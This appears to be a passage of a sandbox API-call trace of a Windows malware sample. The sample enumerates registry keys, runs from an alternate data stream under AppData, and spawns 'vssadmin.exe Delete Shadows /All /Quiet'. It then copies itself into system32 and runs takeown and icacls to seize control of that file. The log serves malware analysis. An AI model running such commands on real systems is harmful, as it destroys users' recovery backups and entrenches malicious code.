[0029.119] lstrcmpW (lpString1="errata", lpString2="mobile") returned -1 [0029.119] lstrcmpW (lpString1="system", lpString2="mobile") returned 1 [0029.119] lstrcmpW (lpString1="layout", lpString2="mobile") returned -1 [0029.119] lstrcmpW (lpString1="config", lpString2="mobile") returned -1 [0029.119] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x279e68 [0029.119] lstrcmpW (lpString1="id", lpString2="pc") returned -1 [0029.119] lstrcmpW (lpString1="co", lpString2="pc") returned -1 [0029.119] lstrcmpW (lpString1="db", lpString2="pc") returned -1 [0029.119] RegEnumKeyW (in: hKey=0x98, dwIndex=0x24, lpName=0x18fd58, cchName=0x104 | out: lpName="MPDEV") returned 0x0 [0029.119] lstrlenW (lpString="MPDEV") returned 5 [0029.119] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279e88 [0029.119] lstrcmpW (lpString1="class", lpString2="mpdev") returned -1 [0029.119] lstrcmpW (lpString1="index", lpString2="mpdev") returned -1 [0029.119] lstrcmpW (lpString1="crash", lpString2="mpdev") returned -1 [0029.120] lstrcmpW (lpString1="group", lpString2="mpdev") returned -1 [0029.120] lstrcmpW (lpString1="order", lpString2="mpdev") returned 1 [0029.120] lstrcmpW (lpString1="media", lpString2="mpdev") returned -1 [0029.120] lstrcmpW (lpString1="types", lpString2="mpdev") returned 1 [0029.120] RegEnumKeyW (in: hKey=0x98, dwIndex=0x25, lpName=0x18fd58, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0029.120] lstrlenW (lpString="MSDTC") returned 5 [0029.120] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279ea8 [0029.120] lstrcmpW (lpString1="class", lpString2="msdtc") returned -1 [0029.120] lstrcmpW (lpString1="index", lpString2="msdtc") returned -1 [0029.120] lstrcmpW (lpString1="crash", lpString2="msdtc") returned -1 [0029.120] lstrcmpW (lpString1="group", lpString2="msdtc") returned -1 [0029.120] lstrcmpW (lpString1="order", lpString2="msdtc") returned 1 [0029.120] lstrcmpW (lpString1="media", lpString2="msdtc") returned -1 [0029.120] lstrcmpW (lpString1="types", lpString2="msdtc") returned 1 [0029.120] lstrcmpW (lpString1="mpdev", lpString2="msdtc") returned -1 [0029.120] RegEnumKeyW (in: hKey=0x98, dwIndex=0x26, lpName=0x18fd58, cchName=0x104 | out: lpName="MUI") returned 0x0 [0029.120] lstrlenW (lpString="MUI") returned 3 [0029.120] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279ec8 [0029.120] lstrcmpW (lpString1="agp", lpString2="mui") returned -1 [0029.120] lstrcmpW (lpString1="app", lpString2="mui") returned -1 [0029.120] lstrcmpW (lpString1="cmf", lpString2="mui") returned -1 [0029.120] lstrcmpW (lpString1="com", lpString2="mui") returned -1 [0029.120] lstrcmpW (lpString1="els", lpString2="mui") returned -1 [0029.120] lstrcmpW (lpString1="hal", lpString2="mui") returned -1 [0029.120] lstrcmpW (lpString1="lsa", lpString2="mui") returned -1 [0029.120] lstrcmpW (lpString1="drm", lpString2="mui") returned -1 [0029.120] RegEnumKeyW (in: hKey=0x98, dwIndex=0x27, lpName=0x18fd58, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0029.120] lstrlenW (lpString="NetDiagFx") returned 9 [0029.120] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279ee8 [0029.120] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0029.120] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0029.120] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0029.120] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0029.121] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x279f08 [0029.121] lstrcmpW (lpString1="acpi", lpString2="diag") returned -1 [0029.121] lstrcmpW (lpString1="name", lpString2="diag") returned 1 [0029.121] lstrcmpW (lpString1="file", lpString2="diag") returned 1 [0029.121] lstrcmpW (lpString1="list", lpString2="diag") returned 1 [0029.121] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x279f28 [0029.121] lstrcmpW (lpString1="id", lpString2="fx") returned 1 [0029.121] lstrcmpW (lpString1="co", lpString2="fx") returned -1 [0029.121] lstrcmpW (lpString1="db", lpString2="fx") returned -1 [0029.121] lstrcmpW (lpString1="pc", lpString2="fx") returned 1 [0029.121] RegEnumKeyW (in: hKey=0x98, dwIndex=0x28, lpName=0x18fd58, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0029.121] lstrlenW (lpString="NetTrace") returned 8 [0029.121] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279f48 [0029.121] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0029.121] lstrcmpW (lpString1="net", lpString2="net") returned 0 [0029.121] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279f48 | out: hHeap=0x260000) returned 1 [0029.121] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279f48 [0029.121] lstrcmpW (lpString1="class", lpString2="trace") returned -1 [0029.121] lstrcmpW (lpString1="index", lpString2="trace") returned -1 [0029.121] lstrcmpW (lpString1="crash", lpString2="trace") returned -1 [0029.121] lstrcmpW (lpString1="group", lpString2="trace") returned -1 [0029.122] lstrcmpW (lpString1="order", lpString2="trace") returned -1 [0029.122] RegEnumKeyW (in: hKey=0x98, dwIndex=0x29, lpName=0x18fd58, cchName=0x104 | out: lpName="Network") returned 0x0 [0029.122] lstrlenW (lpString="Network") returned 7 [0029.122] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27a5c8 [0029.122] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2a, lpName=0x18fd58, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0029.122] lstrlenW (lpString="NetworkProvider") returned 15 [0029.122] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27a5f0 [0029.122] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2b, lpName=0x18fd58, cchName=0x104 | out: lpName="Nls") returned 0x0 [0029.122] lstrlenW (lpString="Nls") returned 3 [0029.122] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279f68 [0029.122] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2c, lpName=0x18fd58, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0029.122] lstrlenW (lpString="NodeInterfaces") returned 14 [0029.122] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x279f88 [0029.122] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2d, lpName=0x18fd58, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0029.122] lstrlenW (lpString="Nsi") returned 3 [0029.122] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279fa8 [0029.122] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2e, lpName=0x18fd58, cchName=0x104 | out: lpName="PCW") returned 0x0 [0029.122] lstrlenW (lpString="PCW") returned 3 [0029.122] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279fc8 [0029.122] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2f, lpName=0x18fd58, cchName=0x104 | out: lpName="PnP") returned 0x0 [0029.122] lstrlenW (lpString="PnP") returned 3 [0029.122] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x279fe8 [0029.123] RegEnumKeyW (in: hKey=0x98, dwIndex=0x30, lpName=0x18fd58, cchName=0x104 | out: lpName="Power") returned 0x0 [0029.123] lstrlenW (lpString="Power") returned 5 [0029.123] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27a008 [0029.123] RegEnumKeyW (in: hKey=0x98, dwIndex=0x31, lpName=0x18fd58, cchName=0x104 | out: lpName="Print") returned 0x0 [0029.123] lstrlenW (lpString="Print") returned 5 [0029.123] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27a028 [0029.123] RegEnumKeyW (in: hKey=0x98, dwIndex=0x32, lpName=0x18fd58, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0029.123] lstrlenW (lpString="PriorityControl") returned 15 [0029.123] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27a618 [0029.123] RegEnumKeyW (in: hKey=0x98, dwIndex=0x33, lpName=0x18fd58, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0029.123] lstrlenW (lpString="ProductOptions") returned 14 [0029.123] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27a640 [0029.123] RegEnumKeyW (in: hKey=0x98, dwIndex=0x34, lpName=0x18fd58, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0029.123] lstrlenW (lpString="Remote Assistance") returned 17 [0029.123] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27a690 [0029.123] RegEnumKeyW (in: hKey=0x98, dwIndex=0x35, lpName=0x18fd58, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0029.123] lstrlenW (lpString="SafeBoot") returned 8 [0029.123] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x27a048 [0029.123] RegEnumKeyW (in: hKey=0x98, dwIndex=0x36, lpName=0x18fd58, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0029.123] lstrlenW (lpString="ScsiPort") returned 8 [0029.123] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x27a088 [0029.123] RegEnumKeyW (in: hKey=0x98, dwIndex=0x37, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0029.123] lstrlenW (lpString="SecurePipeServers") returned 17 [0029.123] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27a6b8 [0029.124] RegEnumKeyW (in: hKey=0x98, dwIndex=0x38, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0029.124] lstrlenW (lpString="SecurityProviders") returned 17 [0029.124] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27a708 [0029.124] RegEnumKeyW (in: hKey=0x98, dwIndex=0x39, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0029.124] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0029.124] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27a758 [0029.124] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3a, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0029.124] lstrlenW (lpString="ServiceProvider") returned 15 [0029.124] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27a780 [0029.124] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3b, lpName=0x18fd58, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0029.124] lstrlenW (lpString="Session Manager") returned 15 [0029.124] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27a780 [0029.124] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3c, lpName=0x18fd58, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0029.124] lstrlenW (lpString="SNMP") returned 4 [0029.124] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x27a0e8 [0029.124] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3d, lpName=0x18fd58, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0029.124] lstrlenW (lpString="SQMServiceList") returned 14 [0029.124] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x22) returned 0x27ade0 [0029.124] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3e, lpName=0x18fd58, cchName=0x104 | out: lpName="Srp") returned 0x0 [0029.124] lstrlenW (lpString="Srp") returned 3 [0029.124] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x27a108 [0029.124] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3f, lpName=0x18fd58, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0029.124] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0029.124] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x27a128 [0029.125] RegEnumKeyW (in: hKey=0x98, dwIndex=0x40, lpName=0x18fd58, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0029.125] lstrlenW (lpString="StillImage") returned 10 [0029.125] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27a128 [0029.125] RegEnumKeyW (in: hKey=0x98, dwIndex=0x41, lpName=0x18fd58, cchName=0x104 | out: lpName="Storage") returned 0x0 [0029.125] lstrlenW (lpString="Storage") returned 7 [0029.125] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27a7d0 [0029.125] RegEnumKeyW (in: hKey=0x98, dwIndex=0x42, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0029.125] lstrlenW (lpString="SystemResources") returned 15 [0029.125] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27a7f8 [0029.125] RegEnumKeyW (in: hKey=0x98, dwIndex=0x43, lpName=0x18fd58, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0029.125] lstrlenW (lpString="TabletPC") returned 8 [0029.125] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27a820 [0029.125] RegEnumKeyW (in: hKey=0x98, dwIndex=0x44, lpName=0x18fd58, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0029.125] lstrlenW (lpString="Terminal Server") returned 15 [0029.125] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27a848 [0029.125] RegEnumKeyW (in: hKey=0x98, dwIndex=0x45, lpName=0x18fd58, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0029.125] lstrlenW (lpString="TimeZoneInformation") returned 19 [0029.125] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x27a168 [0029.125] RegEnumKeyW (in: hKey=0x98, dwIndex=0x46, lpName=0x18fd58, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0029.125] lstrlenW (lpString="usbflags") returned 8 [0029.125] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27a898 [0029.125] RegEnumKeyW (in: hKey=0x98, dwIndex=0x47, lpName=0x18fd58, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0029.125] lstrlenW (lpString="usbstor") returned 7 [0029.126] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27a8c0 [0029.126] RegEnumKeyW (in: hKey=0x98, dwIndex=0x48, lpName=0x18fd58, cchName=0x104 | out: lpName="VAN") returned 0x0 [0029.126] lstrlenW (lpString="VAN") returned 3 [0029.126] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x27a1a8 [0029.126] RegEnumKeyW (in: hKey=0x98, dwIndex=0x49, lpName=0x18fd58, cchName=0x104 | out: lpName="Video") returned 0x0 [0029.126] lstrlenW (lpString="Video") returned 5 [0029.126] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27a1c8 [0029.126] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4a, lpName=0x18fd58, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0029.126] lstrlenW (lpString="wcncsvc") returned 7 [0029.126] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27a8e8 [0029.126] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4b, lpName=0x18fd58, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0029.126] lstrlenW (lpString="Wdf") returned 3 [0029.126] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x27a1e8 [0029.126] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4c, lpName=0x18fd58, cchName=0x104 | out: lpName="WDI") returned 0x0 [0029.126] lstrlenW (lpString="WDI") returned 3 [0029.126] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x27a208 [0029.126] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4d, lpName=0x18fd58, cchName=0x104 | out: lpName="Windows") returned 0x0 [0029.126] lstrlenW (lpString="Windows") returned 7 [0029.126] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27a910 [0029.126] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4e, lpName=0x18fd58, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0029.126] lstrlenW (lpString="Winlogon") returned 8 [0029.126] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27a938 [0029.126] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4f, lpName=0x18fd58, cchName=0x104 | out: lpName="WMI") returned 0x0 [0029.126] lstrlenW (lpString="WMI") returned 3 [0029.127] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x27a228 [0029.127] RegEnumKeyW (in: hKey=0x98, dwIndex=0x50, lpName=0x18fd58, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0029.127] lstrlenW (lpString="hivelist") returned 8 [0029.127] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27a960 [0029.127] RegEnumKeyW (in: hKey=0x98, dwIndex=0x51, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0029.127] lstrlenW (lpString="SystemInformation") returned 17 [0029.127] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27a988 [0029.127] RegEnumKeyW (in: hKey=0x98, dwIndex=0x52, lpName=0x18fd58, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0029.127] lstrlenW (lpString="Winresume") returned 9 [0029.127] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x27a988 [0029.127] RegEnumKeyW (in: hKey=0x98, dwIndex=0x53, lpName=0x18fd58, cchName=0x104 | out: lpName="winresume") returned 0x103 [0029.127] RegCloseKey (hKey=0x98) returned 0x0 [0029.127] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin\" -r" [0029.127] StrChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin\" -r", wMatch=0x22) returned="\" -r" [0029.127] StrChrW (lpStart="\" -r", wMatch=0x20) returned=" -r" [0029.127] StrTrimW (in: psz="-r", pszTrimChars=" " | out: psz="-r") returned 0 [0029.127] GetVersion () returned 0x1db10106 [0029.127] GetCurrentProcess () returned 0xffffffff [0029.127] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18ff28 | out: TokenHandle=0x18ff28*=0x98) returned 1 [0029.127] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x14, TokenInformation=0x18ff20, TokenInformationLength=0x4, ReturnLength=0x18ff2c | out: TokenInformation=0x18ff20, ReturnLength=0x18ff2c) returned 1 [0029.127] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff2c | out: TokenInformation=0x0, ReturnLength=0x18ff2c) returned 0 [0029.128] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x27a248 [0029.128] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x19, TokenInformation=0x27a248, TokenInformationLength=0x14, ReturnLength=0x18ff2c | out: TokenInformation=0x27a248, ReturnLength=0x18ff2c) returned 1 [0029.129] GetSidSubAuthorityCount (pSid=0x27a250*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x27a251 [0029.129] GetSidSubAuthority (pSid=0x27a250*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x27a258 [0029.129] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a248 | out: hHeap=0x260000) returned 1 [0029.129] CloseHandle (hObject=0x98) returned 1 [0029.129] lstrlenW (lpString="-r") returned 2 [0029.129] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x6) returned 0x27ae10 [0029.129] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x4) returned 0x27ae20 [0029.129] lstrlenW (lpString="-r") returned 2 [0029.129] GetWindowsDirectoryW (in: lpBuffer=0x0, uSize=0x0 | out: lpBuffer=0x0) returned 0xb [0029.129] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x220) returned 0x27ae30 [0029.129] GetWindowsDirectoryW (in: lpBuffer=0x27ae30, uSize=0xc | out: lpBuffer="C:\\Windows") returned 0xa [0029.129] lstrcpyW (in: lpString1=0x27ae46, lpString2="system32" | out: lpString1="system32") returned="system32" [0029.129] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27a9b0 [0029.129] lstrcpyW (in: lpString1=0x27ae58, lpString2="Pipe" | out: lpString1="Pipe") returned="Pipe" [0029.129] lstrcatW (in: lpString1="C:\\Windows\\system32\\Pipe", lpString2=".exe" | out: lpString1="C:\\Windows\\system32\\Pipe.exe") returned="C:\\Windows\\system32\\Pipe.exe" [0029.129] PathFileExistsW (pszPath="C:\\Windows\\system32\\Pipe.exe") returned 0 [0029.130] lstrlenW (lpString="C:\\Windows\\system32\\Pipe.exe") returned 28 [0029.130] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x240) returned 0x27b058 [0029.130] lstrcpyW (in: lpString1=0x27b080, lpString2="vssadmin.exe Delete Shadows /All /Quiet" | out: lpString1="vssadmin.exe Delete Shadows /All /Quiet") returned="vssadmin.exe Delete Shadows /All /Quiet" [0029.130] GetModuleHandleA (lpModuleName="kernel32") returned 0x76d30000 [0029.130] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x76d5ebe8 [0029.130] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=0) returned 1 [0029.130] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\vssadmin.exe Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18febc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ff00 | out: lpCommandLine="C:\\Windows\\system32\\vssadmin.exe Delete Shadows /All /Quiet", lpProcessInformation=0x18ff00*(hProcess=0x9c, hThread=0x98, dwProcessId=0x5c4, dwThreadId=0xa4c)) returned 1 [0029.144] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 1 [0029.144] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0063.232] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x18ff30 | out: lpExitCode=0x18ff30*=0x0) returned 1 [0063.232] CloseHandle (hObject=0x98) returned 1 [0063.233] CloseHandle (hObject=0x9c) returned 1 [0063.233] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pipe:bin"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0063.233] GetFileSize (in: hFile=0x9c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf000 [0063.233] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xf002) returned 0x27d1f8 [0063.234] ReadFile (in: hFile=0x9c, lpBuffer=0x27d1f8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x18ff0c, lpOverlapped=0x0 | out: lpBuffer=0x27d1f8*, lpNumberOfBytesRead=0x18ff0c*=0xf000, lpOverlapped=0x0) returned 1 [0063.236] CloseHandle (hObject=0x9c) returned 1 [0063.236] CreateFileW (lpFileName="C:\\Windows\\system32\\Pipe.exe" (normalized: "c:\\windows\\system32\\pipe.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0063.237] WriteFile (in: hFile=0x9c, lpBuffer=0x27d1f8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x18ff18, lpOverlapped=0x0 | out: lpBuffer=0x27d1f8*, lpNumberOfBytesWritten=0x18ff18*=0xf000, lpOverlapped=0x0) returned 1 [0063.239] SetEndOfFile (hFile=0x9c) returned 1 [0063.239] CloseHandle (hObject=0x9c) returned 1 [0063.240] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27d1f8 | out: hHeap=0x260000) returned 1 [0063.240] _snwprintf (in: _Dest=0x27b080, _Count=0x120, _Format="takeown.exe /F %s" | out: _Dest="takeown.exe /F C:\\Windows\\system32\\Pipe.exe") returned 43 [0063.240] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\system32\\Pipe.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18febc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ff00 | out: lpCommandLine="C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\system32\\Pipe.exe", lpProcessInformation=0x18ff00*(hProcess=0x98, hThread=0x9c, dwProcessId=0xa2c, dwThreadId=0xa38)) returned 1 [0063.252] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0063.828] GetExitCodeProcess (in: hProcess=0x98, lpExitCode=0x18ff30 | out: lpExitCode=0x18ff30*=0x0) returned 1 [0063.828] CloseHandle (hObject=0x9c) returned 1 [0063.828] CloseHandle (hObject=0x98) returned 1 [0063.828] _snwprintf (in: _Dest=0x27b080, _Count=0x120, _Format="icacls.exe %s /reset" | out: _Dest="icacls.exe C:\\Windows\\system32\\Pipe.exe /reset") returned 46 [0063.828] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\icacls.exe C:\\Windows\\system32\\Pipe.exe /reset", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18febc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ff00 | out: lpCommandLine="C:\\Windows\\system32\\icacls.exe C:\\Windows\\system32\\Pipe.exe /reset", 